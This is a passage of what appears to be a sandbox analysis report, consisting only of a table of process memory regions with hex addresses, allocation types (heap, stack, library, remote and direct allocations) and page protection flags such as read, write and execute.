|
page read and write
|
||
|
1ACE3B70000
|
heap
|
page read and write
|
||
|
7FFD344CA000
|
trusted library allocation
|
page read and write
|
||
|
2040E479000
|
heap
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
7A17000
|
stack
|
page read and write
|
||
|
4F28000
|
heap
|
page read and write
|
||
|
8120000
|
direct allocation
|
page read and write
|
||
|
272B000
|
heap
|
page read and write
|
||
|
47B0000
|
heap
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
6800000
|
direct allocation
|
page read and write
|
||
|
4BFF000
|
unkown
|
page read and write
|
||
|
2040E41F000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
2A7C000
|
heap
|
page read and write
|
||
|
22760000
|
unclassified section
|
page execute and read and write
|
||
|
6A54000
|
heap
|
page read and write
|
||
|
2A7B000
|
heap
|
page read and write
|
||
|
224C2000
|
heap
|
page read and write
|
||
|
204101C0000
|
heap
|
page read and write
|
||
|
40BE000
|
stack
|
page read and write
|
||
|
678B000
|
stack
|
page read and write
|
||
|
22682000
|
heap
|
page read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
204101C0000
|
heap
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
2040E43B000
|
heap
|
page read and write
|
||
|
1ACFDD3E000
|
heap
|
page read and write
|
||
|
68D5000
|
heap
|
page read and write
|
||
|
17F1073000
|
stack
|
page read and write
|
||
|
20410324000
|
heap
|
page read and write
|
||
|
2040E52E000
|
heap
|
page read and write
|
||
|
28E0000
|
heap
|
page read and write
|
||
|
2040E3EC000
|
heap
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
1ACE3AFA000
|
heap
|
page read and write
|
||
|
6BF0000
|
direct allocation
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
4F11000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
4DC5000
|
remote allocation
|
page execute and read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
29AB000
|
stack
|
page read and write
|
||
|
7FFD344D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C50000
|
heap
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
4F11000
|
heap
|
page read and write
|
||
|
1ACF55B1000
|
trusted library allocation
|
page read and write
|
||
|
708B000
|
stack
|
page read and write
|
||
|
422F000
|
stack
|
page read and write
|
||
|
243C000
|
stack
|
page read and write
|
||
|
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
|
2040E529000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
1ACE5400000
|
trusted library allocation
|
page read and write
|
||
|
478F000
|
unkown
|
page read and write
|
||
|
17F13FE000
|
stack
|
page read and write
|
||
|
21FFE000
|
stack
|
page read and write
|
||
|
2283C000
|
unclassified section
|
page execute and read and write
|
||
|
6A56000
|
heap
|
page read and write
|
||
|
47B9000
|
heap
|
page read and write
|
||
|
17F147E000
|
stack
|
page read and write
|
||
|
1ACE72E1000
|
trusted library allocation
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
4F11000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
17F240B000
|
stack
|
page read and write
|
||
|
17F183E000
|
stack
|
page read and write
|
||
|
17F173E000
|
stack
|
page read and write
|
||
|
6A5A000
|
heap
|
page read and write
|
||
|
432E000
|
stack
|
page read and write
|
||
|
5381000
|
trusted library allocation
|
page read and write
|
||
|
6850000
|
heap
|
page read and write
|
||
|
6C63000
|
heap
|
page read and write
|
||
|
2040E42D000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
17F16B8000
|
stack
|
page read and write
|
||
|
22448000
|
heap
|
page read and write
|
||
|
2D9D000
|
heap
|
page read and write
|
||
|
1ACE3A7C000
|
heap
|
page read and write
|
||
|
7FFD343CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
40D8000
|
trusted library allocation
|
page read and write
|
||
|
87E0000
|
direct allocation
|
page execute and read and write
|
||
|
3FE4000
|
trusted library allocation
|
page read and write
|
||
|
4889000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
6A5A000
|
heap
|
page read and write
|
||
|
7FFD34600000
|
trusted library allocation
|
page read and write
|
||
|
7B10000
|
heap
|
page read and write
|
||
|
2041033F000
|
heap
|
page read and write
|
||
|
25DE000
|
stack
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
2040E479000
|
heap
|
page read and write
|
||
|
6AA6000
|
heap
|
page read and write
|
||
|
2040E466000
|
heap
|
page read and write
|
||
|
2040E407000
|
heap
|
page read and write
|
||
|
2040E43C000
|
heap
|
page read and write
|
||
|
80AC000
|
stack
|
page read and write
|
||
|
44D6000
|
trusted library allocation
|
page read and write
|
||
|
1ACE60E5000
|
trusted library allocation
|
page read and write
|
||
|
4180000
|
heap
|
page read and write
|
||
|
6C10000
|
heap
|
page read and write
|
||
|
2040E480000
|
heap
|
page read and write
|
||
|
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
|
2041034A000
|
heap
|
page read and write
|
||
|
1ACE3BF0000
|
trusted library allocation
|
page read and write
|
||
|
4F1E000
|
heap
|
page read and write
|
||
|
30B0000
|
heap
|
page readonly
|
||
|
2040E3FD000
|
heap
|
page read and write
|
||
|
2900000
|
trusted library section
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
6CB6000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
674D000
|
stack
|
page read and write
|
||
|
6C48000
|
trusted library allocation
|
page read and write
|
||
|
6A54000
|
heap
|
page read and write
|
||
|
2D93000
|
heap
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
7ACE000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
80E0000
|
direct allocation
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
2212D000
|
stack
|
page read and write
|
||
|
7DEC000
|
stack
|
page read and write
|
||
|
2244A000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
4F24000
|
heap
|
page read and write
|
||
|
4F3A000
|
heap
|
page read and write
|
||
|
17F238D000
|
stack
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
4F11000
|
heap
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
694A1FD000
|
stack
|
page read and write
|
||
|
2040E3FD000
|
heap
|
page read and write
|
||
|
6A8A000
|
stack
|
page read and write
|
||
|
3FD8000
|
heap
|
page read and write
|
||
|
3FD0000
|
heap
|
page read and write
|
||
|
7FFD34312000
|
trusted library allocation
|
page read and write
|
||
|
17F153E000
|
stack
|
page read and write
|
||
|
7A80000
|
heap
|
page read and write
|
||
|
6B3E000
|
stack
|
page read and write
|
||
|
47B0000
|
heap
|
page read and write
|
||
|
47D1000
|
heap
|
page read and write
|
||
|
204101B8000
|
heap
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
2A76000
|
heap
|
page read and write
|
||
|
227D3000
|
unclassified section
|
page execute and read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
7FFD34500000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F6E000
|
stack
|
page read and write
|
||
|
436F000
|
stack
|
page read and write
|
||
|
67B0000
|
direct allocation
|
page read and write
|
||
|
4CA3000
|
heap
|
page read and write
|
||
|
4889000
|
heap
|
page read and write
|
||
|
6C30000
|
heap
|
page execute and read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
1ACFDA20000
|
heap
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
30DA000
|
heap
|
page read and write
|
||
|
1ACE55B1000
|
trusted library allocation
|
page read and write
|
||
|
7B6B000
|
trusted library allocation
|
page read and write
|
||
|
278E000
|
unkown
|
page read and write
|
||
|
47D0000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
80F0000
|
direct allocation
|
page read and write
|
||
|
4370000
|
heap
|
page execute and read and write
|
||
|
226CB000
|
heap
|
page read and write
|
||
|
204101A3000
|
heap
|
page read and write
|
||
|
1ACE5500000
|
heap
|
page execute and read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
7D0C000
|
stack
|
page read and write
|
||
|
4F47000
|
heap
|
page read and write
|
||
|
1ACFDC80000
|
heap
|
page read and write
|
||
|
47C0000
|
heap
|
page read and write
|
||
|
22320000
|
direct allocation
|
page read and write
|
||
|
1ACF55C0000
|
trusted library allocation
|
page read and write
|
||
|
1ACFDA00000
|
heap
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
1ACE6115000
|
trusted library allocation
|
page read and write
|
||
|
221FC000
|
stack
|
page read and write
|
||
|
53A9000
|
trusted library allocation
|
page read and write
|
||
|
6D07000
|
heap
|
page read and write
|
||
|
69D0000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
2040E43C000
|
heap
|
page read and write
|
||
|
306E000
|
unkown
|
page read and write
|
||
|
4012000
|
trusted library allocation
|
page read and write
|
||
|
69B0000
|
direct allocation
|
page read and write
|
||
|
1ACFDC88000
|
heap
|
page read and write
|
||
|
4B78000
|
trusted library allocation
|
page read and write
|
||
|
4F1E000
|
heap
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
1ACE54D7000
|
heap
|
page execute and read and write
|
||
|
6A7A000
|
heap
|
page read and write
|
||
|
2040E473000
|
heap
|
page read and write
|
||
|
67F0000
|
direct allocation
|
page read and write
|
||
|
4F48000
|
heap
|
page read and write
|
||
|
1ACE3BB0000
|
trusted library allocation
|
page read and write
|
||
|
2040E52B000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
1ACE5B5A000
|
trusted library allocation
|
page read and write
|
||
|
4F3A000
|
heap
|
page read and write
|
||
|
6949DFE000
|
stack
|
page read and write
|
||
|
6A5A000
|
heap
|
page read and write
|
||
|
3FE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
42AE000
|
stack
|
page read and write
|
||
|
7FFD344F5000
|
trusted library allocation
|
page read and write
|
||
|
6AA6000
|
heap
|
page read and write
|
||
|
2272C000
|
heap
|
page read and write
|
||
|
4F42000
|
heap
|
page read and write
|
||
|
2A4A000
|
heap
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
2A6F000
|
heap
|
page read and write
|
||
|
6AA6000
|
heap
|
page read and write
|
||
|
6A61000
|
heap
|
page read and write
|
||
|
400A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
6920000
|
heap
|
page read and write
|
||
|
3FB0000
|
trusted library section
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
6A56000
|
heap
|
page read and write
|
||
|
2D0F000
|
unkown
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
226B7000
|
heap
|
page read and write
|
||
|
1ACFDCDF000
|
heap
|
page read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
1ACE71F2000
|
trusted library allocation
|
page read and write
|
||
|
8010000
|
trusted library allocation
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
69C0000
|
direct allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
6A7A000
|
heap
|
page read and write
|
||
|
6A58000
|
heap
|
page read and write
|
||
|
22836000
|
unclassified section
|
page execute and read and write
|
||
|
6BE0000
|
direct allocation
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
7010000
|
trusted library allocation
|
page read and write
|
||
|
17F163C000
|
stack
|
page read and write
|
||
|
1ACE3AB1000
|
heap
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
3FF9000
|
trusted library allocation
|
page read and write
|
||
|
2272F000
|
heap
|
page read and write
|
||
|
1ACF58A8000
|
trusted library allocation
|
page read and write
|
||
|
4F48000
|
heap
|
page read and write
|
||
|
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
|
1ACE5BF4000
|
trusted library allocation
|
page read and write
|
||
|
303A000
|
stack
|
page read and write
|
||
|
21AE0000
|
direct allocation
|
page read and write
|
||
|
4B9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
2040E3D7000
|
heap
|
page read and write
|
||
|
1ACE73C8000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
|
67E0000
|
direct allocation
|
page read and write
|
||
|
4E0E000
|
stack
|
page read and write
|
||
|
2040E528000
|
heap
|
page read and write
|
||
|
17F15B6000
|
stack
|
page read and write
|
||
|
227B9000
|
unclassified section
|
page execute and read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
34E3000
|
heap
|
page read and write
|
||
|
1ACE3AD1000
|
heap
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
7B0F000
|
stack
|
page read and write
|
||
|
3076000
|
heap
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
8100000
|
direct allocation
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
6A4A000
|
heap
|
page read and write
|
||
|
3FE0000
|
trusted library allocation
|
page read and write
|
||
|
1ACE3A30000
|
heap
|
page read and write
|
||
|
7D50000
|
heap
|
page read and write
|
||
|
8945000
|
direct allocation
|
page execute and read and write
|
||
|
2040E41F000
|
heap
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
2040E463000
|
heap
|
page read and write
|
||
|
4381000
|
trusted library allocation
|
page read and write
|
||
|
6A70000
|
heap
|
page read and write
|
||
|
1ACE3A91000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
21B20000
|
direct allocation
|
page read and write
|
||
|
4CA0000
|
heap
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
|
6BFE000
|
stack
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
|
1ACE54D0000
|
heap
|
page execute and read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
2040E48E000
|
heap
|
page read and write
|
||
|
4F42000
|
heap
|
page read and write
|
||
|
7FFD34313000
|
trusted library allocation
|
page execute and read and write
|
||
|
20410323000
|
heap
|
page read and write
|
||
|
34EE000
|
heap
|
page read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
6F5D000
|
stack
|
page read and write
|
||
|
47C1000
|
heap
|
page read and write
|
||
|
7E3C000
|
heap
|
page read and write
|
||
|
6F80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34670000
|
trusted library allocation
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
2DFC000
|
stack
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
4030000
|
trusted library allocation
|
page read and write
|
||
|
21EA0000
|
heap
|
page read and write
|
||
|
2040E3B6000
|
heap
|
page read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
204101AB000
|
heap
|
page read and write
|
||
|
4F46000
|
heap
|
page read and write
|
||
|
24C0000
|
heap
|
page read and write
|
||
|
21AD0000
|
direct allocation
|
page read and write
|
||
|
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
222F0000
|
unclassified section
|
page execute and read and write
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
2040E434000
|
heap
|
page read and write
|
||
|
2A78000
|
heap
|
page read and write
|
||
|
6A57000
|
heap
|
page read and write
|
||
|
7FFD34310000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343C0000
|
trusted library allocation
|
page read and write
|
||
|
7020000
|
trusted library allocation
|
page read and write
|
||
|
4D3F000
|
stack
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
6B7E000
|
stack
|
page read and write
|
||
|
6C40000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
7F3E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
29C2000
|
stack
|
page read and write
|
||
|
6FF0000
|
trusted library allocation
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
7D4C000
|
stack
|
page read and write
|
||
|
4F58000
|
heap
|
page read and write
|
||
|
2040E448000
|
heap
|
page read and write
|
||
|
6FE0000
|
trusted library allocation
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
47DE000
|
heap
|
page read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
|
2040FE50000
|
heap
|
page read and write
|
||
|
7FFD3431D000
|
trusted library allocation
|
page execute and read and write
|
||
|
47C1000
|
heap
|
page read and write
|
||
|
7E00000
|
heap
|
page read and write
|
||
|
6A58000
|
heap
|
page read and write
|
||
|
17F193C000
|
stack
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
2040E439000
|
heap
|
page read and write
|
||
|
2D9C000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
204101C0000
|
heap
|
page read and write
|
||
|
4F10000
|
heap
|
page read and write
|
||
|
2040E52D000
|
heap
|
page read and write
|
||
|
68B0000
|
direct allocation
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
2040E48E000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
7FFD343C6000
|
trusted library allocation
|
page read and write
|
||
|
7E20000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
8140000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
2040E41F000
|
heap
|
page read and write
|
||
|
4CA1000
|
heap
|
page read and write
|
||
|
47B0000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
6CE2000
|
heap
|
page read and write
|
||
|
2040E520000
|
heap
|
page read and write
|
||
|
1ACE610B000
|
trusted library allocation
|
page read and write
|
||
|
1ACFDABC000
|
heap
|
page read and write
|
||
|
220AE000
|
stack
|
page read and write
|
||
|
2040E3CE000
|
heap
|
page read and write
|
||
|
3079000
|
heap
|
page read and write
|
||
|
6AA6000
|
heap
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
2040E479000
|
heap
|
page read and write
|
||
|
1ACE5430000
|
trusted library allocation
|
page read and write
|
||
|
6C73000
|
heap
|
page read and write
|
||
|
2040E2A0000
|
heap
|
page read and write
|
||
|
7FFD343D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4265000
|
heap
|
page execute and read and write
|
||
|
1ACE3930000
|
heap
|
page read and write
|
||
|
463F000
|
stack
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
7FFD3432B000
|
trusted library allocation
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
204101A0000
|
heap
|
page read and write
|
||
|
1ACFDC70000
|
heap
|
page read and write
|
||
|
7DF442F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ACFDC78000
|
heap
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
7FFD34314000
|
trusted library allocation
|
page read and write
|
||
|
6CEB000
|
heap
|
page read and write
|
||
|
4822000
|
heap
|
page read and write
|
||
|
4260000
|
remote allocation
|
page execute and read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
223D1000
|
heap
|
page read and write
|
||
|
27CE000
|
stack
|
page read and write
|
||
|
1ACE3A10000
|
heap
|
page read and write
|
||
|
1ACE3ABF000
|
heap
|
page read and write
|
||
|
2040E432000
|
heap
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
|
1ACE3BE0000
|
heap
|
page readonly
|
||
|
2D5D000
|
stack
|
page read and write
|
||
|
1ACE57D5000
|
trusted library allocation
|
page read and write
|
||
|
223D1000
|
heap
|
page read and write
|
||
|
204101A4000
|
heap
|
page read and write
|
||
|
22561000
|
heap
|
page read and write
|
||
|
5EC000
|
stack
|
page read and write
|
||
|
4260000
|
heap
|
page execute and read and write
|
||
|
2040E390000
|
heap
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
1ACE55A7000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
7FFD34430000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD344F7000
|
trusted library allocation
|
page read and write
|
||
|
4CA1000
|
heap
|
page read and write
|
||
|
6A55000
|
heap
|
page read and write
|
||
|
2DAA000
|
heap
|
page read and write
|
||
|
24A0000
|
heap
|
page read and write
|
||
|
4D48000
|
heap
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
694A0FE000
|
stack
|
page read and write
|
||
|
7E2C000
|
heap
|
page read and write
|
||
|
6FD0000
|
trusted library allocation
|
page read and write
|
||
|
204101DB000
|
heap
|
page read and write
|
||
|
1ACFDC8C000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
4F11000
|
heap
|
page read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
2040E46E000
|
heap
|
page read and write
|
||
|
3FED000
|
trusted library allocation
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
307A000
|
heap
|
page read and write
|
||
|
6A5A000
|
heap
|
page read and write
|
||
|
2040E407000
|
heap
|
page read and write
|
||
|
41EE000
|
stack
|
page read and write
|
||
|
2272F000
|
heap
|
page read and write
|
||
|
4F4D000
|
heap
|
page read and write
|
||
|
688A000
|
stack
|
page read and write
|
||
|
21B10000
|
direct allocation
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
21EFE000
|
stack
|
page read and write
|
||
|
47C6000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
17F18BE000
|
stack
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
21FBB000
|
stack
|
page read and write
|
||
|
4F34000
|
heap
|
page read and write
|
||
|
6D26000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
47C1000
|
heap
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
222BF000
|
stack
|
page read and write
|
||
|
7E02000
|
heap
|
page read and write
|
||
|
17F11FE000
|
stack
|
page read and write
|
||
|
42EF000
|
stack
|
page read and write
|
||
|
1ACE71EE000
|
trusted library allocation
|
page read and write
|
||
|
224D5000
|
heap
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
5181000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
7FFD344F2000
|
trusted library allocation
|
page read and write
|
||
|
1ACE55A0000
|
heap
|
page read and write
|
||
|
17F117E000
|
stack
|
page read and write
|
||
|
4F24000
|
heap
|
page read and write
|
||
|
29C4000
|
stack
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
8000000
|
trusted library allocation
|
page read and write
|
||
|
1ACE6B15000
|
trusted library allocation
|
page read and write
|
||
|
24A4000
|
heap
|
page read and write
|
||
|
47F3000
|
heap
|
page read and write
|
||
|
2040E3A1000
|
heap
|
page read and write
|
||
|
7E54000
|
heap
|
page read and write
|
||
|
22653000
|
heap
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
|
1ACE5A2A000
|
trusted library allocation
|
page read and write
|
||
|
47CF000
|
heap
|
page read and write
|
||
|
17F230E000
|
stack
|
page read and write
|
||
|
53E7000
|
trusted library allocation
|
page read and write
|
||
|
298C000
|
stack
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
2640000
|
heap
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
291C000
|
heap
|
page read and write
|
||
|
67C0000
|
direct allocation
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
2223D000
|
stack
|
page read and write
|
||
|
2040E43C000
|
heap
|
page read and write
|
||
|
1ACFDA7A000
|
heap
|
page read and write
|
||
|
6AA6000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
1ACFDA26000
|
heap
|
page read and write
|
||
|
21F7D000
|
stack
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
7E44000
|
heap
|
page read and write
|
||
|
1ACE3C55000
|
heap
|
page read and write
|
||
|
2040E46B000
|
heap
|
page read and write
|
||
|
17F12FC000
|
stack
|
page read and write
|
||
|
47C6000
|
heap
|
page read and write
|
||
|
6A0000
|
heap
|
page readonly
|
||
|
2673000
|
heap
|
page read and write
|
||
|
2040E48E000
|
heap
|
page read and write
|
||
|
17F17BE000
|
stack
|
page read and write
|
||
|
47EE000
|
heap
|
page read and write
|
||
|
6910000
|
heap
|
page read and write
|
||
|
2040E4B0000
|
heap
|
page read and write
|
||
|
43DA000
|
trusted library allocation
|
page read and write
|
||
|
6F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C40000
|
heap
|
page readonly
|
||
|
8110000
|
direct allocation
|
page read and write
|
||
|
26C4000
|
heap
|
page read and write
|
||
|
204101A7000
|
heap
|
page read and write
|
||
|
204101C4000
|
heap
|
page read and write
|
||
|
1ACFDB90000
|
heap
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
2040E407000
|
heap
|
page read and write
|
||
|
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
|
20410320000
|
heap
|
page read and write
|
||
|
5181000
|
heap
|
page read and write
|
||
|
4F19000
|
heap
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
4F1C000
|
heap
|
page read and write
|
||
|
4170000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ACFDD51000
|
heap
|
page read and write
|
||
|
220EF000
|
stack
|
page read and write
|
||
|
264B000
|
heap
|
page read and write
|
||
|
204101AE000
|
heap
|
page read and write
|
||
|
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
|
3214000
|
heap
|
page read and write
|
||
|
47C6000
|
heap
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
7FFD344C1000
|
trusted library allocation
|
page read and write
|
||
|
2041034A000
|
heap
|
page read and write
|
||
|
6A54000
|
heap
|
page read and write
|
||
|
6AD0000
|
heap
|
page read and write
|
||
|
412C000
|
stack
|
page read and write
|
||
|
61C5000
|
remote allocation
|
page execute and read and write
|
||
|
4CA1000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
7DAE000
|
stack
|
page read and write
|
||
|
2040E3FD000
|
heap
|
page read and write
|
||
|
2040E437000
|
heap
|
page read and write
|
||
|
694978A000
|
stack
|
page read and write
|
||
|
9D45000
|
direct allocation
|
page execute and read and write
|
||
|
226FC000
|
heap
|
page read and write
|
||
|
8020000
|
trusted library allocation
|
page read and write
|
||
|
24A8000
|
heap
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
227BD000
|
unclassified section
|
page execute and read and write
|
||
|
2040E481000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
684E000
|
stack
|
page read and write
|
||
|
6A5A000
|
heap
|
page read and write
|
||
|
